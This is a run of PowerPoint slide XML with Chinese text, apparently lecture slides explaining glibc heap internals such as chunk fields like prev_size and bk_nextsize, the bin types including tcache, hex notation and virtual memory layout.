                <a:schemeClr val="bg2"/>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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bk_nextsize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="右大括号 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9619FF95-48F4-4A5F-9474-33B6798860EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="2181255"/>
            <a:ext cx="324946" cy="196185"/>
          </a:xfrm>
          <a:prstGeom prst="righ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zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="右大括号 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DF8F51-B4E4-44C3-A39E-616B6931EB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="5097175"/>
            <a:ext cx="324946" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="righ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zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="右大括号 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8C7AA2-FF54-46B6-9231-D18692EE4843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7965614" y="4318001"/>
            <a:ext cx="324946" cy="1363950"/>
          </a:xfrm>
          <a:prstGeom prst="righ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15CACFF8-4006-4D73-899D-F81E3E8B69CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833150" y="2094681"/>
            <a:ext cx="4095929"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仅当前一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</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free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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902F6E7D-636C-4F74-8C01-1A9AA3014AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8323065" y="4815310"/>
            <a:ext cx="2504147"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仅为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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A13925DF-8456-40FD-B76F-3FE8F255706A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803286" y="5204896"/>
            <a:ext cx="3126049"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仅为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>large free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="右大括号 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B359D0-0531-46FD-947B-5508CE86FCD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987040" y="4712814"/>
            <a:ext cx="324946" cy="196185"/>
          </a:xfrm>
          <a:prstGeom prst="righ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12FC9CF7-E5EF-435D-BDC5-65D503148105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3280282" y="4610916"/>
            <a:ext cx="4844916"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仅为处于双向链表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="右大括号 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEEFB01-E94F-4B54-88EC-40848BC5BD6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480560" y="3211420"/>
            <a:ext cx="324946" cy="936279"/>
          </a:xfrm>
          <a:prstGeom prst="righ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6B28F74C-BEF0-4DA7-A89A-ED728E1A5332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4833150" y="3494178"/>
            <a:ext cx="2289409"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占据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>域的低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184223583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4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0895A9D-698F-4E4A-8F7F-DCE02A15C4F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422902" y="1564009"/>
            <a:ext cx="846707" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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99882DD6-8AE5-459B-8AC4-DA3D8B7280FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878584" y="2287297"/>
            <a:ext cx="7157731" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>管理 arena 中空闲 chunk 的结构，以数组的形式存在，数组元素为相应大小的 chunk 链表的链表头，存在于 arena 的 malloc_state 中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E28EEC5-E142-441B-AB67-E3173C7F42EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870023" y="3429000"/>
            <a:ext cx="2451953" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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unsorted bin </a:t>
            </a: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fast bins </a:t>
            </a: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small bins </a:t>
            </a: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large bins </a:t>
            </a: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(tcache)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA7FB3B-4034-4BD6-932B-8C209A3D4AAA}"/>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bin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221733853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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A98720B4-6763-4FDE-8486-84858A318A2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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94875F5E-8D8E-4D80-AFBD-B03CC16722DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="1458203"/>
            <a:ext cx="2066207" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5CD911-EB0F-4F15-ADE1-2945AF501858}"/>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6480000" y="2160000"/>
            <a:ext cx="4010025" cy="3152775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57F36EF-3E58-4E3D-8BC9-DD96A1300718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312380" y="3165416"/>
            <a:ext cx="3667760"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若前一个物理相邻的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="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free chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，则表示其大小。否则用于存储前一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1735503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0937216-F1D1-43AC-AAEC-4905C5B80376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325155" y="2143320"/>
            <a:ext cx="2339102" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>编码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E947F7CE-5660-4F2D-A56C-5B637257A7A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176349" y="2723866"/>
            <a:ext cx="1510350" cy="369332"/>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1Byte = 8bits</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30537596-D144-4E41-B3BC-07E8A80649C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365230" y="3442910"/>
            <a:ext cx="2321469" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>常以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进制表示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5623D9A4-3A80-4051-9CF5-105A9FE0A0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727508" y="4069621"/>
            <a:ext cx="1959191" cy="369332"/>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0x3c = 0011 1100 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{751F35E4-7815-42DE-89EB-5B5FBC82BBA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="2143320"/>
            <a:ext cx="3499676" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>虚拟内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用户空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>每个进程一份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4B03993-748E-4B7D-A15C-01966D6DA706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="3107609"/>
            <a:ext cx="3961341" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>虚拟内存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内核空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>所有进程共享一份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DD882E-986D-4479-BA94-48CEB1C81881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005627" y="4071898"/>
            <a:ext cx="6250429" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
